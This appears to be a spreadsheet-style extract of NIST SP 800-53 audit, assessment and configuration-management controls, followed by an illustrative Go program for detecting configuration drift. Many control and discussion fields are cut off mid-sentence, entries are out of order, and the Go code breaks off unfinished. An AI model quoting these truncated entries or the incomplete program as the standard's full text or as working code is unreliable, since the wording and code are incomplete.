AU-13(2)	Monitoring for Information Disclosure | Review of Monitored Sites	Review the list of open-source information sites being monitored [Assignment: organization-defined frequency].	Reviewing the current list of open-source information sites being monitored on a regular basis helps to ensure that the selected sites remain relevant. The review also provides the opportunity to add new open-source information sites with the potential to provide evidence of unauthorized disclosure of organizational information. The list of sites monitored and informed by	None.
AU-13(3)	Monitoring for Information Disclosure | Unauthorized Replication of Information	Employ discovery techniques, processes, and tools to determine if external entities are replicating organizational information in an unauthorized manner.	The unauthorized use or replication of organizational information by external entities can cause adverse impacts on organizational operations and assets, including damage to reputation. Such activity can include the replication of an organizational website by an adversary or hostile threat actor who attempts to impersonate the web-hosting organization. Discovery tools, techniques, and	None.
AU-14	Session Audit	a. Provide and implement the capability for [Assignment: organization-defined users or roles] to [Selection (one or more): record; view; hear; log] the content of a user session under [Assignment: organization-defined circumstances]; and	Session audits can include monitoring keystrokes, tracking websites visited, and recording information a	AC-3, AC-8, AU-2, AU-3, AU-4, AU-5, AU-8, AU-9, AU-11, AU-12.
AU-14(1)	Session Audit | System Start-up	Initiate session audits automatically at system start-up.	The automatic initiation of session audits at startup helps to ensure that the information being captured on selected individuals is complete and not subject to compromise through tampering by malicious threat actors.	None.
AU-8(1)	Time Stamps | Synchronization with Authoritative Time Source	[Withdrawn: Moved to SC-45(1).]
AU-14(3)	Session Audit | Remote Viewing and Listening	Provide and implement the capability for authorized users to remotely view and hear content related t	None.	AC-17.
AU-8(2) Time Stamps | Secondary Authoritative Time Source [Withdrawn: Moved to SC-45(2).]
AU-16	Cross-organizational Audit Logging	Employ [Assignment: organization-defined methods] for coordinating [Assignment: organization-defin	When organizations use systems or services of external organizations, the audit logging capability ne	AU-3, AU-6, AU-7, CA-3, PT-7.
AU-16(1)	Cross-organizational Audit Logging | Identity Preservation	Preserve the identity of individuals in cross-organizational audit trails.	Identity preservation is applied when there is a need to be able to trace actions that are performed ac	IA-2, IA-4, IA-5, IA-8.
AU-16(2)	Cross-organizational Audit Logging | Sharing of Audit Information	Provide cross-organizational audit information to [Assignment: organization-defined organizations]	Due to the distributed nature of the audit information, cross-organization sharing of audit informat	IR-4, SI-4.
AU-16(3)	Cross-organizational Audit Logging | Disassociability	Implement [Assignment: organization-defined measures] to disassociate individuals from audit information transmitted across organizational boundaries.	Preserving identities in audit trails could have privacy ramifications, such as enabling the tracking and profiling of individuals, but may not be operationally necessary. These risks could be further amplified when transmitting information across organizational boundaries. Implementing privacy-enhancing cryptographic techniques can disassociate individuals from audit information and reduce	None.
CA-1	Policy and Procedures	a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] assessment, authorization, and monitoring policy that:	Assessment, authorization, and monitoring policy and procedures address the controls in the CA family	PM-9, PS-8, SI-12.
CA-2	Control Assessments	a. Select the appropriate assessor or assessment team for the type of assessment to be conducted; b. Develop a control assessment plan that describes the scope of the assessment including:	Organizations ensure that control assessors possess the required skills and technical expertise to develop effective assessment plans and to conduct assessments of system-specific, hybrid, common, and program management controls, as appropriate. The required skills include general knowledge of risk management concepts and approaches as well as comprehensive knowledge of	AC-20, CA-5, CA-6, CA-7, PM-9, RA-5, RA-10, SA-11, SC-38, SI-3, SI-12, SR-2, SR-3.
CA-2(1)	Control Assessments | Independent Assessors	Employ independent assessors or assessment teams to conduct control assessments.	Independent assessors or assessment teams are individuals or groups who conduct impartial assessments of systems. Impartiality means that assessors are free from any perceived or actual conflicts of interest regarding the development, operation, sustainment, or management of the systems under assessment or the determination of control effectiveness. To achieve impartiality,	None.
CA-2(2)	Control Assessments | Specialized Assessments	Include as part of control assessments, [Assignment: organization-defined frequency], [Selection: an	Organizations can conduct specialized assessments, including verification and validation, system monit	PE-3, SI-2.
CA-2(3)	Control Assessments | Leveraging Results from External Organizations	Leverage the results of control assessments performed by [Assignment: organization-defined extern	Organizations may rely on control assessments of organizational systems by other (external) organiz	SA-4.
CA-3	Information Exchange	a. Approve and manage the exchange of information between the system and other systems using [Selection (one or more): interconnection security agreements; information exchange security agreements; memoranda of understanding or agreement; service level agreements; user agreements; nondisclosure agreements; [Assignment: organization-defined type of agreement]];	System information exchange requirements apply to information exchanges between two or more systems. System information exchanges include connections via leased lines or virtual private networks, connections to internet service providers, database sharing or exchanges of database transaction information, connections and exchanges with cloud services, exchanges via web-based	AC-4, AC-20, AU-16, CA-6, IA-3, IR-4, PL-2, PT-7, RA-3, SA-9, SC-7, SI-12.
CA-3(1)	Information Exchange | Unclassified National Security System Connections	[Withdrawn: Moved to SC-7(25).]
CA-3(2)	Information Exchange | Classified National Security System Connections	[Withdrawn: Moved to SC-7(26).]
CA-3(3)	Information Exchange | Unclassified Non-national Security System Connections	[Withdrawn: Moved to SC-7(27).]
CA-3(4)	Information Exchange | Connections to Public Networks	[Withdrawn: Moved to SC-7(28).]
CA-3(5)	Information Exchange | Restrictions on External System Connections	[Withdrawn: Moved to SC-7(5).]
CA-3(6)	Information Exchange | Transfer Authorizations	Verify that individuals or systems transferring data between interconnecting systems have the requisite	To prevent unauthorized individuals and systems from making information transfers to protected syste	AC-2, AC-3, AC-4.
CA-3(7)	Information Exchange | Transitive Information Exchanges	(a) Identify transitive (downstream) information exchanges with other systems through the systems identified in CA-3a; and	Transitive or downstream information exchanges are information exchanges between the system or syst	SC-7.
CA-4	Security Certification	[Withdrawn: Incorporated into CA-2.]
CA-5	Plan of Action and Milestones	a. Develop a plan of action and milestones for the system to document the planned remediation actions of the organization to correct weaknesses or deficiencies noted during the assessment of the controls and to reduce or eliminate known vulnerabilities in the system; and	Plans of action and milestones are useful for any type of organization to track planned remedial act	CA-2, CA-7, PM-4, PM-9, RA-7, SI-2, SI-12.
CA-5(1)	Plan of Action and Milestones | Automation Support for Accuracy and Currency	Ensure the accuracy, currency, and availability of the plan of action and milestones for the system using [Assignment: organization-defined automated mechanisms].	Using automated tools helps maintain the accuracy, currency, and availability of the plan of action and milestones and facilitates the coordination and sharing of security and privacy information throughout the organization. Such coordination and information sharing help to identify systemic weaknesses or deficiencies in organizational systems and ensure that appropriate resources are	None.
CA-6	Authorization	a. Assign a senior official as the authorizing official for the system; b. Assign a senior official as the authorizing official for common controls available for inheritance by organizational systems;	Authorizations are official management decisions by senior officials to authorize operation of systems, authorize the use of common controls for inheritance by organizational systems and explicitly accept the risk to organizational operations and assets, individuals, other organizations, and the Nation based on the implementation of agreed-upon controls. Authorizing officials provide	CA-2, CA-3, CA-7, PM-9, PM-10, RA-3, SA-10, SI-12.
CA-6(1)	Authorization | Joint Authorization — Intra-organization	Employ a joint authorization process for the system that includes multiple authorizing officials from	Assigning multiple authorizing officials from the same organization to serve as co-authorizing offici	AC-6.
CA-6(2)	Authorization | Joint Authorization — Inter-organization	Employ a joint authorization process for the system that includes multiple authorizing officials with a	Assigning multiple authorizing officials, at least one of whom comes from an external organization, t	AC-6.
CA-7 Continuous Monitoring
Control Text: Develop a system-level continuous monitoring strategy and implement continuous monitoring in accordance with the organization-level continuous monitoring strategy that includes:
Discussion: Continuous monitoring at the system level facilitates ongoing awareness of the system security and privacy posture to support organizational risk management decisions. The terms continuous and ongoing imply that organizations assess and monitor their controls and risks at a frequency sufficient to support risk-based decisions. Different types of controls may require different
Related Controls: AC-2, AC-6, AC-17, AT-4, AU-6, AU-13, CA-2, CA-5, CA-6, CM-3, CM-4, CM-6, CM-11, IA-5, IR-5, MA-2, MA-3, MA-4, PE-3, PE-6, PE-14, PE-16, PE-20, PL-2, PM-4, PM-6, PM-9, PM-10, PM-12, PM-14, PM-23, PM-28, PM-31, PS-7, PT-7, RA-3, RA-5, RA-7, RA-10, SA-8, SA-9, SA-11, SC-5, SC-7, SC-18, SC-38, SC-43, SI-3, SI-4, SI-12, SR-6.

CA-7(1) Continuous Monitoring | Independent Assessment
Control Text: Employ independent assessors or assessment teams to monitor the controls in the system on an ongoing basis.
Discussion: Organizations maximize the value of control assessments by requiring that assessments be conducted by assessors with appropriate levels of independence. The level of required independence is based on organizational continuous monitoring strategies. Assessor independence provides a degree of impartiality to the monitoring process. To achieve such impartiality, assessors
Related Controls: None.

CA-7(2) Continuous Monitoring | Types of Assessments
Control Text: [Withdrawn: Incorporated into CA-2.]

CA-7(3) Continuous Monitoring | Trend Analyses
Control Text: Employ trend analyses to determine if control implementations, the frequency of continuous monitoring activities, and the types of activities used in the continuous monitoring strategy need to be modified based on empirical data.
Discussion: Trend analyses include examining recent threat information that addresses the types of threat events that have occurred in the organization or the Federal Government, success rates of certain types of attacks, emerging vulnerabilities in technologies, evolving social engineering techniques, the effectiveness of configuration settings, results from multiple control assessments, and findings
Related Controls: None.

CA-7(4) Continuous Monitoring | Risk Monitoring
Control Text: Ensure risk monitoring is an integral part of the continuous monitoring strategy that includes the following: Effectiveness monitoring;
Discussion: Risk monitoring is informed by the established organizational risk tolerance. Effectiveness monitoring determines the ongoing effectiveness of the implemented risk response measures. Compliance monitoring verifies that required risk response measures are implemented. It also verifies that security and privacy requirements are satisfied. Change monitoring identifies changes
Related Controls: None.

CA-7(5) Continuous Monitoring | Consistency Analysis
Control Text: Employ the following actions to validate that policies are established and implemented controls are operating in a consistent manner: [Assignment: organization-defined actions].
Discussion: Security and privacy controls are often added incrementally to a system. As a result, policies for selecting and implementing controls may be inconsistent, and the controls could fail to work together in a consistent or coordinated manner. At a minimum, the lack of consistency and coordination could mean that there are unacceptable security and privacy gaps in the system. At
Related Controls: None.

CA-7(6) Continuous Monitoring | Automation Support for Monitoring
Control Text: Ensure the accuracy, currency, and availability of monitoring results for the system using [Assignment: organization-defined automated mechanisms].
Discussion: Using automated tools for monitoring helps to maintain the accuracy, currency, and availability of monitoring information, which in turn helps to increase the level of ongoing awareness of the system security and privacy posture in support of organizational risk management decisions.
Related Controls: None.

CA-8 Penetration Testing
Control Text: Conduct penetration testing [Assignment: organization-defined frequency] on [Assignment: organiz
Discussion: Penetration testing is a specialized type of assessment conducted on systems or individual system components to identify vulnerabilities that could be exploited by adversaries. Penetration testing goes beyond automated vulnerability scanning and is conducted by agents and teams with demonstrable skills and experience that include technical expertise in network, operating system,
Related Controls: RA-5, RA-10, SA-11, SR-5, SR-6.

CA-8(1) Penetration Testing | Independent Penetration Testing Agent or Team
Control Text: Employ an independent penetration testing agent or team to perform penetration testing on the sy
Discussion: Independent penetration testing agents or teams are individuals or groups who conduct impartial pene
Related Controls: CA-2.
CA-8(2) Penetration Testing | Red Team Exercises
Control Text: Employ the following red-team exercises to simulate attempts by adversaries to compromise organizational systems in accordance with applicable rules of engagement: [Assignment: organization-defined red team exercises].
Discussion: Red team exercises extend the objectives of penetration testing by examining the security and privacy posture of organizations and the capability to implement effective cyber defenses. Red team exercises simulate attempts by adversaries to compromise mission and business functions and provide a comprehensive assessment of the security and privacy posture of systems and
Related Controls: None.

CA-8(3) Penetration Testing | Facility Penetration Testing
Control Text: Employ a penetration testing process that includes [Assignment: organization-defined frequency] [Sel
Discussion: Penetration testing of physical access points can provide information on critical vulnerabilities in t
Related Controls: CA-2, PE-3.

CA-9 Internal System Connections
Control Text: a. Authorize internal connections of [Assignment: organization-defined system components or classes of components] to the system;
Discussion: Internal system connections are connections between organizational systems and separate constituent
Related Controls: AC-3, AC-4, AC-18, AC-19, CM-2, IA-3, SC-7, SI-12.

CA-9(1) Internal System Connections | Compliance Checks
Control Text: Perform security and privacy compliance checks on constituent system components prior to the estab
Discussion: Compliance checks include verification of the relevant baseline configuration.
Related Controls: CM-6.
CM-1 Policy and Procedures
Control Text: a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] configuration management policy that:
Discussion: Configuration management policy and procedures address the controls in the CM family that are impleme
Related Controls: PM-9, PS-8, SA-8, SI-12.

CM-2 Baseline Configuration
Control Text: a. Develop, document, and maintain under configuration control, a current baseline configuration of the system; and
Discussion: Baseline configurations for systems and system components include connectivity, operational, and co
Related Controls: AC-19, AU-6, CA-9, CM-1, CM-3, CM-5, CM-6, CM-8, CM-9, CP-9, CP-10, CP-12, MA-2, PL-8, PM-5, SA-8, SA-10, SA-15, SC-18.

CM-11(1) User-installed Software | Alerts for Unauthorized Installations
Control Text: [Withdrawn: Incorporated into CM-8(3).]

CM-2(2) Baseline Configuration | Automation Support for Accuracy and Currency
Control Text: Maintain the currency, completeness, accuracy, and availability of the baseline configuration of th
Discussion: Automated mechanisms that help organizations maintain consistent baseline configurations for system
Related Controls: CM-7, IA-3, RA-5.

CM-2(3) Baseline Configuration | Retention of Previous Configurations
Control Text: Retain [Assignment: organization-defined number] of previous versions of baseline configurations of the system to support rollback.
Discussion: Retaining previous versions of baseline configurations to support rollback include hardware, software, firmware, configuration files, configuration records, and associated documentation.
Related Controls: None.

CM-2(1) Baseline Configuration | Reviews and Updates
Control Text: [Withdrawn: Incorporated into CM-2.]

CM-2(4) Baseline Configuration | Unauthorized Software
Control Text: [Withdrawn: Incorporated into CM-7(4).]

CM-2(6) Baseline Configuration | Development and Test Environments
Control Text: Maintain a baseline configuration for system development and test environments that is managed sep
Discussion: Establishing separate baseline configurations for development, testing, and operational environments
Related Controls: CM-4, SC-3, SC-7.

CM-2(7) Baseline Configuration | Configure Systems and Components for High-risk Areas
Control Text: (a) Issue [Assignment: organization-defined systems or system components] with [Assignment: organization-defined configurations] to individuals traveling to locations that the organization deems to be of significant risk; and
Discussion: When it is known that systems or system components will be in high-risk areas external to the organi
Related Controls: MP-4, MP-5.

CM-3 Configuration Change Control
Control Text: a. Determine and document the types of changes to the system that are configuration-controlled; b. Review proposed configuration-controlled changes to the system and approve or disapprove such changes with explicit consideration for security and privacy impact analyses;
Discussion: Configuration change control for organizational systems involves the systematic proposal, justifica
Related Controls: CA-7, CM-2, CM-4, CM-5, CM-6, CM-9, CM-11, IA-3, MA-2, PE-16, PT-6, RA-8, SA-8, SA-10, SC-28, SC-34, SC-37, SI-2, SI-3, SI-4, SI-7, SI-10, SR-11.

CM-3(1) Configuration Change Control | Automated Documentation, Notification, and Prohibition of Changes
Control Text: Use [Assignment: organization-defined automated mechanisms] to: (a) Document proposed changes to the system;
Discussion: None.
Related Controls: None.

CM-3(2) Configuration Change Control | Testing, Validation, and Documentation of Changes
Control Text: Test, validate, and document changes to the system before finalizing the implementation of the changes.
Discussion: Changes to systems include modifications to hardware, software, or firmware components and configuration settings defined in CM-6. Organizations ensure that testing does not interfere with system operations that support organizational mission and business functions. Individuals or groups conducting tests understand security and privacy policies and procedures, system security and
Related Controls: None.

CM-3(3) Configuration Change Control | Automated Change Implementation
Control Text: Implement changes to the current system baseline and deploy the updated baseline across the installed base using [Assignment: organization-defined automated mechanisms].
Discussion: Automated tools can improve the accuracy, consistency, and availability of configuration baseline information. Automation can also provide data aggregation and data correlation capabilities, alerting mechanisms, and dashboards to support risk-based decision-making within the organization.
Related Controls: None.

CM-3(4) Configuration Change Control | Security and Privacy Representatives
Control Text: Require [Assignment: organization-defined security and privacy representatives] to be members of the [Assignment: organization-defined configuration change control element].
Discussion: Information security and privacy representatives include system security officers, senior agency information security officers, senior agency officials for privacy, or system privacy officers. Representation by personnel with information security and privacy expertise is important because changes to system configurations can have unintended side effects, some of which may be security-
Related Controls: None.

CM-3(5) Configuration Change Control | Automated Security Response
Control Text: Implement the following security responses automatically if baseline configurations are changed in an unauthorized manner: [Assignment: organization-defined security responses].
Discussion: Automated security responses include halting selected system functions, halting system processing, and issuing alerts or notifications to organizational personnel when there is an unauthorized modification of a configuration item.
Related Controls: None.

CM-3(6) Configuration Change Control | Cryptography Management
Control Text: Ensure that cryptographic mechanisms used to provide the following controls are under configurati
Discussion: The controls referenced in the control enhancement refer to security and privacy controls from the c
Related Controls: SC-12.
CM-3(7) Configuration Change Control | Review System Changes
Control Text: Review changes to the system [Assignment: organization-defined frequency] or when [Assignment: o
Discussion: Indications that warrant a review of changes to the system and the specific circumstances justifying
Related Controls: AU-6, AU-7, CM-3.

CM-3(8) Configuration Change Control | Prevent or Restrict Configuration Changes
Control Text: Prevent or restrict changes to the configuration of the system under the following circumstances: [Assignment: organization-defined circumstances].
Discussion: System configuration changes can adversely affect critical system security and privacy functionality. Change restrictions can be enforced through automated mechanisms.
Related Controls: None.

CM-4 Impact Analyses
Control Text: Analyze changes to the system to determine potential security and privacy impacts prior to change
Discussion: Organizational personnel with security or privacy responsibilities conduct impact analyses. Individu
Related Controls: CA-7, CM-3, CM-8, CM-9, MA-2, RA-3, RA-5, RA-8, SA-5, SA-8, SA-10, SI-2.

CM-4(1) Impact Analyses | Separate Test Environments
Control Text: Analyze changes to the system in a separate test environment before implementation in an operational
Discussion: A separate test environment requires an environment that is physically or logically separate and dis
Related Controls: SA-11, SC-7.

CM-4(2) Impact Analyses | Verification of Controls
Control Text: After system changes, verify that the impacted controls are implemented correctly, operating as int
Discussion: Implementation in this context refers to installing changed code in the operational system that may h
Related Controls: SA-11, SC-3, SI-6.

CM-5 Access Restrictions for Change
Control Text: Define, document, approve, and enforce physical and logical access restrictions associated with chan
Discussion: Changes to the hardware, software, or firmware components of systems or the operational procedures rel
Related Controls: AC-3, AC-5, AC-6, CM-9, PE-3, SC-28, SC-34, SC-37, SI-2, SI-10.

CM-5(1) Access Restrictions for Change | Automated Access Enforcement and Audit Records
Control Text: (a) Enforce access restrictions using [Assignment: organization-defined automated mechanisms]; and
Discussion: Organizations log system accesses associated with applying configuration changes to ensure that con
Related Controls: AU-2, AU-6, AU-7, AU-12, CM-6, CM-11, SI-12.

CM-2(5) Baseline Configuration | Authorized Software
Control Text: [Withdrawn: Incorporated into CM-7(5).]

CM-5(2) Access Restrictions for Change | Review System Changes
Control Text: [Withdrawn: Incorporated into CM-3(7).]

CM-5(4) Access Restrictions for Change | Dual Authorization
Control Text: Enforce dual authorization for implementing changes to [Assignment: organization-defined system c
Discussion: Organizations employ dual authorization to help ensure that any changes to selected system componen
Related Controls: AC-2, AC-5, CM-3.

CM-5(5) Access Restrictions for Change | Privilege Limitation for Production and Operation
Control Text: (a) Limit privileges to change system components and system-related information within a production or operational environment; and
Discussion: In many organizations, systems support multiple mission and business functions. Limiting privilege
Related Controls: AC-2.

CM-5(6) Access Restrictions for Change | Limit Library Privileges
Control Text: Limit privileges to change software resident within software libraries.
Discussion: Software libraries include privileged programs.
Related Controls: AC-2.

CM-5(3) Access Restrictions for Change | Signed Components
Control Text: [Withdrawn: Moved to CM-14.]
CM-6 Configuration Settings
Control Text: a. Establish and document configuration settings for components employed within the system that reflect the most restrictive mode consistent with operational requirements using [Assignment: organization-defined common secure configurations];
Discussion: Configuration settings are the parameters that can be changed in the hardware, software, or firmware components of the system that affect the security and privacy posture or functionality of the system. Information technology products for which configuration settings can be defined include mainframe computers, servers, workstations, operating systems, mobile devices,
Related Controls: AC-3, AC-19, AU-2, AU-6, CA-9, CM-2, CM-3, CM-5, CM-7, CM-11, CP-7, CP-9, CP-10, IA-3, IA-5, PL-8, PL-9, RA-5, SA-4, SA-5, SA-8, SA-9, SC-18, SC-28, SC-43, SI-2, SI-4, SI-6.

CM-6(1) Configuration Settings | Automated Management, Application, and Verification
Control Text: Manage, apply, and verify configuration settings for [Assignment: organization-defined system com
Discussion: Automated tools (e.g., hardening tools, baseline configuration tools) can improve the accuracy, consi
Related Controls: CA-7.

CM-6(2) Configuration Settings | Respond to Unauthorized Changes
Control Text: Take the following actions in response to unauthorized changes to [Assignment: organization-defined
Discussion: Responses to unauthorized changes to configuration settings include alerting designated organizatio
Related Controls: IR-4, IR-6, SI-7.

CM-5(7) Access Restrictions for Change | Automatic Implementation of Security Safeguards
Control Text: [Withdrawn: Incorporated into SI-7.]

CM-6(3) Configuration Settings | Unauthorized Change Detection
Control Text: [Withdrawn: Incorporated into SI-7.]
CM-7 Least Functionality
Control Text: a. Configure the system to provide only [Assignment: organization-defined mission essential capabilities]; and
Discussion: Systems provide a wide variety of functions and services. Some of the functions and services routine
Related Controls: AC-3, AC-4, CM-2, CM-5, CM-6, CM-11, RA-5, SA-4, SA-5, SA-8, SA-9, SA-15, SC-2, SC-3, SC-7, SC-37, SI-4.

CM-7(1) Least Functionality | Periodic Review
Control Text: (a) Review the system [Assignment: organization-defined frequency] to identify unnecessary and/or nonsecure functions, ports, protocols, software, and services; and
Discussion: Organizations review functions, ports, protocols, and services provided by systems or system componen
Related Controls: AC-18.

CM-7(2) Least Functionality | Prevent Program Execution
Control Text: Prevent program execution in accordance with [Selection (one or more): [Assignment: organization-de
Discussion: Prevention of program execution addresses organizational policies, rules of behavior, and/or access
Related Controls: CM-8, PL-4, PL-9, PM-5, PS-6.

CM-7(3) Least Functionality | Registration Compliance
Control Text: Ensure compliance with [Assignment: organization-defined registration requirements for functions, ports, protocols, and services].
Discussion: Organizations use the registration process to manage, track, and provide oversight for systems and implemented functions, ports, protocols, and services.
Related Controls: None.

CM-7(4) Least Functionality | Unauthorized Software — Deny-by-exception
Control Text: (a) Identify [Assignment: organization-defined software programs not authorized to execute on the system];
Discussion: Unauthorized software programs can be limited to specific versions or from a specific source. The co
Related Controls: CM-6, CM-8, CM-10, PL-9, PM-5.

CM-7(5) Least Functionality | Authorized Software — Allow-by-exception
Control Text: (a) Identify [Assignment: organization-defined software programs authorized to execute on the system];
Discussion: Authorized software programs can be limited to specific versions or from a specific source. To facili
Related Controls: CM-2, CM-6, CM-8, CM-10, PL-9, PM-5, SA-10, SC-34, SI-7.

CM-7(6) Least Functionality | Confined Environments with Limited Privileges
Control Text: Require that the following user-installed software execute in a confined physical or virtual machine e
Discussion: Organizations identify software that may be of concern regarding its origin or potential for containi
Related Controls: CM-11, SC-44.

CM-7(7) Least Functionality | Code Execution in Protected Environments
Control Text: Allow execution of binary or machine-executable code only in confined physical or virtual machine environments and with the explicit approval of [Assignment: organization-defined personnel or roles] when such code is:
Discussion: Code execution in protected environments applies to all sources of binary or machine-executable c
Related Controls: CM-10, SC-44.

CM-7(8) Least Functionality | Binary or Machine Executable Code
Control Text: (a) Prohibit the use of binary or machine-executable code from sources with limited or no warranty or without the provision of source code; and
Discussion: Binary or machine executable code applies to all sources of binary or machine-executable code, incl
Related Controls: SA-5, SA-22.

CM-7(9) Least Functionality | Prohibiting The Use of Unauthorized Hardware
Control Text: (a) Identify [Assignment: organization-defined hardware components authorized for system use]; (b) Prohibit the use or connection of unauthorized hardware components;
Discussion: Hardware components provide the foundation for organizational systems and the platform for the execution of authorized software programs. Managing the inventory of hardware components and controlling which hardware components are permitted to be installed or connected to organizational systems is essential in order to provide adequate security.
Related Controls: None.

CM-8 System Component Inventory
Control Text: a. Develop and document an inventory of system components that: 1. Accurately reflects the system;
Discussion: System components are discrete, identifiable information technology assets that include hardware, software, and firmware. Organizations may choose to implement centralized system component inventories that include components from all organizational systems. In such situations, organizations ensure that the inventories include system-specific information required for
Related Controls: CM-2, CM-7, CM-9, CM-10, CM-11, CM-13, CP-2, CP-9, MA-2, MA-6, PE-20, PL-9, PM-5, SA-4, SA-5, SI-2, SR-4.

CM-8(1) System Component Inventory | Updates During Installation and Removal
Control Text: Update the inventory of system components as part of component installations, removals, and syste
Discussion: Organizations can improve the accuracy, completeness, and consistency of system component inventori
Related Controls: PM-16.

CM-8(2) System Component Inventory | Automated Maintenance
Control Text: Maintain the currency, completeness, accuracy, and availability of the inventory of system components using [Assignment: organization-defined automated mechanisms].
Discussion: Organizations maintain system inventories to the extent feasible. For example, virtual machines can be difficult to monitor because such machines are not visible to the network when not in use. In such cases, organizations maintain as up-to-date, complete, and accurate an inventory as is deemed reasonable. Automated maintenance can be achieved by the implementation of CM-2(2) for
Related Controls: None.

CM-8(3) System Component Inventory | Automated Unauthorized Component Detection
Control Text: (a) Detect the presence of unauthorized hardware, software, and firmware components within the system using [Assignment: organization-defined automated mechanisms] [Assignment: organization-defined frequency]; and
Discussion: Automated unauthorized component detection is applied in addition to the monitoring for unauthor
Related Controls: AC-19, CA-7, RA-5, SC-3, SC-39, SC-44, SI-3, SI-4, SI-7.

CM-8(4) System Component Inventory | Accountability Information
Control Text: Include in the system component inventory information, a means for identifying by [Selection (one o
Discussion: Identifying individuals who are responsible and accountable for administering system components ensu
Related Controls: AC-3.

CM-6(4) Configuration Settings | Conformance Demonstration
Control Text: [Withdrawn: Incorporated into CM-4.]
CM-8(6) System Component Inventory | Assessed Configurations and Approved Deviations
Control Text: Include assessed component configurations and any approved deviations to current deployed configurations in the system component inventory.
Discussion: Assessed configurations and approved deviations focus on configuration settings established by organizations for system components, the specific components that have been assessed to determine compliance with the required configuration settings, and any approved deviations from established configuration settings.
Related Controls: None.

CM-8(7) System Component Inventory | Centralized Repository
Control Text: Provide a centralized repository for the inventory of system components.
Discussion: Organizations may implement centralized system component inventories that include components from all organizational systems. Centralized repositories of system component inventories provide opportunities for efficiencies in accounting for organizational hardware, software, and firmware assets. Such repositories may also help organizations rapidly identify the location and responsible individuals of system components that have been compromised, breached, or are otherwise in need of mitigation actions.
Related Controls: None.

CM-8(8) System Component Inventory | Automated Location Tracking
Control Text: Support the tracking of system components by geographic location using [Assignment: organization-defined automated mechanisms].
Discussion: The use of automated mechanisms to track the location of components can increase the accuracy of component inventories. Such capability may help organizations rapidly identify the location and responsible individuals of system components that have been compromised, breached, or are otherwise in need of mitigation actions. The use of tracking mechanisms can be
Related Controls: None.

CM-8(9) System Component Inventory | Assignment of Components to Systems
Control Text: (a) Assign system components to a system; and (b) Receive an acknowledgement from [Assignment: organization-defined personnel or roles] of this assignment.
Discussion: System components that are not assigned to a system may be unmanaged, lack the required protection, and become an organizational vulnerability.
Related Controls: None.

CM-9 Configuration Management Plan
Control Text: Develop, document, and implement a configuration management plan for the system that: a. Addresses roles, responsibilities, and configuration management processes and procedures;
Discussion: Configuration management activities occur throughout the system development life cycle. As such, there are developmental configuration management activities (e.g., the control of code and software libraries) and operational configuration management activities (e.g., control of installed components and how the components are configured). Configuration management plans satisfy the
Related Controls: CM-2, CM-3, CM-4, CM-5, CM-8, PL-2, RA-8, SA-10, SI-12.

CM-9(1) Configuration Management Plan | Assignment of Responsibility
Control Text: Assign responsibility for developing the configuration management process to organizational personnel that are not directly involved in system development.
Discussion: In the absence of dedicated configuration management teams assigned within organizations, system developers may be tasked with developing configuration management processes using personnel who are not directly involved in system development or system integration. This separation of duties ensures that organizations establish and maintain a sufficient degree of
Related Controls: None.

CM-10 Software Usage Restrictions
Control Text: a. Use software and associated documentation in accordance with contract agreements and copyright laws;
Discussion: Software license tracking can be accomplished by manual or automated methods, depending on organ
Related Controls: AC-17, AU-6, CM-7, CM-8, PM-30, SC-7.

CM-10(1) Software Usage Restrictions | Open-source Software
Control Text: Establish the following restrictions on the use of open-source software: [Assignment: organization-def
Discussion: Open-source software refers to software that is available in source code form. Certain software right
Related Controls: SI-7.

CM-11 User-installed Software
Control Text: a. Establish [Assignment: organization-defined policies] governing the installation of software by users;
Discussion: If provided the necessary privileges, users can install software in organizational systems. To maintain control over the software installed, organizations identify permitted and prohibited actions regarding soft
Related Controls: AC-3, AU-6, CM-2, CM-3, CM-5, CM-6, CM-7, CM-8, PL-4, SI-4, SI-7.

CM-8(5) System Component Inventory | No Duplicate Accounting of Components
Control Text: [Withdrawn: Incorporated into CM-8.]
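CM-8(3) asks for automated detection of unauthorized components, CM-6(2) and CM-3(5) for defined responses when settings or baselines change without authorization, and CM-8(6) for approved deviations to be carried in the inventory so they are not flagged again. The following Go program is an added illustration of how those pieces fit together in one drift check; it is not part of NIST SP 800-53 or of any product. The baseline, the observed scan result, the component names and the single approved deviation are all constructed for the example, and the response strings stand in for whatever actions an organization defines.

```go
package main

import (
	"fmt"
	"sort"
)

// Settings holds the configuration parameters of one component (CM-6).
type Settings map[string]string

// Inventory maps a component identifier to its settings, either as
// baselined (CM-2) or as observed on the running system (CM-8).
type Inventory map[string]Settings

// Deviation is an approved exception recorded alongside the inventory (CM-8(6)).
type Deviation struct{ Component, Setting, Value string }

// Finding is one drift event for a CM-6(2)/CM-8(3) response to act on.
type Finding struct {
	Kind      string // unauthorized-component | missing-component | setting-drift
	Component string
	Setting   string // empty for component-level findings
	Expected  string
	Observed  string
}

// Response maps each kind of finding to the action taken automatically.
// The actions are constructed for the example; CM-3(5) and CM-6(2) list
// alerting, restoring settings and halting functions as the usual choices.
func Response(f Finding) string {
	switch f.Kind {
	case "unauthorized-component":
		return "isolate component and alert"
	case "setting-drift":
		return "restore baseline value and alert"
	}
	return "alert"
}

// Compare reports where observed departs from baseline, skipping deviations
// that have been approved. Output is sorted so repeated runs are comparable.
func Compare(baseline, observed Inventory, approved []Deviation) []Finding {
	allowed := map[Deviation]bool{}
	for _, d := range approved {
		allowed[d] = true
	}
	var out []Finding
	for name, want := range baseline {
		got, present := observed[name]
		if !present {
			out = append(out, Finding{Kind: "missing-component", Component: name})
			continue
		}
		for key, wv := range want {
			ov, has := got[key]
			if !has {
				ov = "<unset>"
			}
			if ov == wv || allowed[Deviation{name, key, ov}] {
				continue
			}
			out = append(out, Finding{Kind: "setting-drift", Component: name, Setting: key, Expected: wv, Observed: ov})
		}
	}
	for name := range observed {
		if _, known := baseline[name]; !known {
			out = append(out, Finding{Kind: "unauthorized-component", Component: name})
		}
	}
	sort.Slice(out, func(i, j int) bool {
		a, b := out[i], out[j]
		if a.Kind != b.Kind {
			return a.Kind < b.Kind
		}
		if a.Component != b.Component {
			return a.Component < b.Component
		}
		return a.Setting < b.Setting
	})
	return out
}

func main() {
	// Constructed sample data: a hardened web host baseline and what a scan observed.
	baseline := Inventory{
		"sshd":      {"PermitRootLogin": "no", "PasswordAuthentication": "no"},
		"nginx":     {"server_tokens": "off", "ssl_protocols": "TLSv1.2 TLSv1.3"},
		"edr-agent": {"enabled": "true"},
	}
	observed := Inventory{
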